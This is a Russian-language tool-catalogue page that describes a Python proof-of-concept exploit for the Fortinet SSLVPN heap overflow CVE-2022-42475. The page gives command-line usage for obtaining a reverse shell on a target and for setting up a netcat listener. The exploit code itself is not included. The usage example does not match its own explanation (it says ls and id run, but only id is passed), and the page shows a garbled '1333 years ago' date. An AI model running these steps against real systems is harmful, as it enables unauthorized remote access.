Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2022-42475-Fortinet — Эксплойт на Python для CVE-2022-42475 (переполнение кучи) в демоне Fortinet SSLVPN. Обеспечивает обратную оболочку через pwntools с настраиваемыми целью, портом и командами. | Kitploit
Инструменты/GitHubGitHub/mustafa1986/cve-2022-42475-fortinet
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеИнструмент Удаленного ДоступаЭксплуатация Бинарных Файлов
GitHubmustafa1986/cve-2022-42475-fortinet

cve-2022-42475-Fortinet

Эксплойт на Python для CVE-2022-42475 (переполнение кучи) в демоне Fortinet SSLVPN. Обеспечивает обратную оболочку через pwntools с настраиваемыми целью, портом и командами.

Репозиторий
1333 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

cve-2022-42475

POC-код для эксплуатации переполнения кучи в SSLVPN-демоне Fortinet

Использование

pip install pwntools Чтобы использовать этот код, сохраните его в файл, например exploit.py, и запустите с помощью Python в командной строке, передав необходимые аргументы. Вот пример команды для запуска эксплойта

python exploit.py <target_host> <target_port> <reverse_ip>

Замените <target_host> на имя хоста или IP-адрес целевой системы, <target_port> на номер порта уязвимого сервиса, а <reverse_ip> на IP-адрес машины, на которой вы хотите получить оболочку. Остальные аргументы — это команды, которые вы хотите выполнить, разделённые пробелами.

Например, если целевая система имеет IP-адрес 192.168.0.100, уязвимый сервис работает на порту 8080, и вы хотите выполнить команды ls и id, выполните следующую команду:

python exploit.py 192.168.0.100 8080 192.168.0.101 id

Это создаст обратное подключение оболочки к 192.168.0.101:31337 и выполнит команды ls и id на целевой системе. Обратите внимание, что вам потребуется запустить слушатель на указанном IP-адресе и порту для приёма обратной оболочки. Вы можете использовать такие инструменты, как ncat или netcat, для создания слушателя.

Скачать инструмент